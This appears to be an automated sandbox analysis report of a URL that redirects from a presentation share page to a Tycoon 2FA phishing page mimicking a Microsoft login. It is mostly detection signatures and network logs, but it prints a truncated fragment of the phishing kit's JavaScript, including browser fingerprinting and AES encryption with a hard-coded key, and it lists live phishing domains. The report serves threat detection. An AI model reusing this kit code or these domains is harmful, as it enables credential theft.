Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://decktop.us/LFzs8Q

Overview

General Information

Sample URL:https://decktop.us/LFzs8Q
Analysis ID:1484314

Detection

HTMLPhisher, Tycoon2FA
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Yara detected Tycoon 2FA PaaS
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
Phishing site or detected (based on various text indicators)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://decktop.us/LFzs8Q MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 4268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,14439112051146858894,12483337357495976748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
20.5.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
    29.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4zi' is highly suspicious. It does not match the legitimate domain 'microsoft.com' associated with Microsoft. The URL structure is complex and contains random strings, which is a common tactic used in phishing attacks. The webpage displays a prominent login form asking for email, phone, or Skype credentials, which is another common phishing tactic. There is no CAPTCHA present, which is often used in legitimate sites to prevent automated attacks. The presence of social engineering techniques, such as mimicking the Microsoft login page, further indicates that this is a phishing site. DOM: 29.8.pages.csv
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziLLM: Score: 10 Reasons: The domain 'uxl.ciaberibu.com' is not associated with Microsoft, and the design is simple and minimalistic, but the domain is unusual and does not appear to be a legitimate Microsoft login page. The webpage appears to be a phishing attempt using Microsoft's branding to trick users into providing their login information. DOM: 29.8.pages.csv
      Source: Yara matchFile source: 29.8.pages.csv, type: HTML
      Source: Yara matchFile source: 20.5.pages.csv, type: HTML
      Source: https://uxl.ciaberibu.com/8knW2ib/HTTP Parser: Base64 decoded: <script>
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziMatcher: Found strong image similarity, brand: MICROSOFT
      Source: Chrome DOM: 17.2OCR Text: Attainable Solutions PDF Access the complete project specifications on the highlighted directory below; this document is shared in Adobe Acrobat format. CLICK HERE TO VIEW/DOWNLOAD BID SPECIFICATIONS ted by decktopus
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "elzm";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "lbq3zyabinduvzdmzeerrxpreuykrq3fepmbj8wukvh7we4vz4";var gdf = "gh9dtplwivv6myavfuv5fwj24saat7rab115";var odf = "ghp1siwmlx2ngr3ukrogup4jfuvump6p8lrkab650";var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(useragent.match(/firefox|fxios/i)){ browsername = "firefox";} else if(useragent.match(/safari/i)){ browsername = "safari";} else if(useragent.match(/opr\//i)){ browsername = "opera";} else if(useragent.match(/edg/i)){ browsername = "edge";} else{ browsername="no browser detection";}function encryptdata(data) { const key = cryptojs.enc.utf8.parse('1234567890123456'); const iv = c...
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: Number of links: 0
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://uxl.ciaberibu.com/8knW2ib/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: Title: Equity Return Maximization does not match URL
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: Invalid link: Terms of use
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: Invalid link: Privacy & cookies
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: <input type="password" .../> found
      Source: https://td.doubleclick.net/td/rul/10970373263?random=1722285386633&cv=11&fst=1722285386633&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be47o0v893181767z8830215601za201zb830215601&gcd=13l3l3l3l1&dma=0&tag_exp=95250752&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.decktopus.com%2Fshare%2FLFzs8Q%2F1&hn=www.googleadservices.com&frm=0&tiba=Decktopus%20%7C%20Create%20Better%20Presentations%20%7C%20AI%20Presentation%20Assistant&npa=0&pscdl=noapi&auid=798213833.1722285385&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1HTTP Parser: No favicon
      Source: https://uxl.ciaberibu.com/8knW2ib/HTTP Parser: No favicon
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: No favicon
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: No <meta name="author".. found
      Source: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4ziHTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49930 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.17:49941 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49845 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49844 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49855 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49852 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.17:49806 -> 1.1.1.1:53
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: global trafficDNS traffic detected: DNS query: decktop.us
      Source: global trafficDNS traffic detected: DNS query: app.decktopus.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: us.i.posthog.com
      Source: global trafficDNS traffic detected: DNS query: apiv21.decktopus.com
      Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: api.gleap.io
      Source: global trafficDNS traffic detected: DNS query: clientstream.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: affiliate.decktopus.com
      Source: global trafficDNS traffic detected: DNS query: us-assets.i.posthog.com
      Source: global trafficDNS traffic detected: DNS query: cfv21.decktopus.com
      Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
      Source: global trafficDNS traffic detected: DNS query: cdn.taboola.com
      Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
      Source: global trafficDNS traffic detected: DNS query: ws.gleap.io
      Source: global trafficDNS traffic detected: DNS query: psb.taboola.com
      Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
      Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
      Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: analytics.google.com
      Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: pips.taboola.com
      Source: global trafficDNS traffic detected: DNS query: trc-events.taboola.com
      Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
      Source: global trafficDNS traffic detected: DNS query: www.facebook.com
      Source: global trafficDNS traffic detected: DNS query: cds.taboola.com
      Source: global trafficDNS traffic detected: DNS query: uxl.ciaberibu.com
      Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: yeqni.jaishict.ru
      Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: bam.nr-data.net
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: github.com
      Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
      Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: httpbin.org
      Source: global trafficDNS traffic detected: DNS query: ipapi.co
      Source: global trafficDNS traffic detected: DNS query: txp.devituarf.su
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
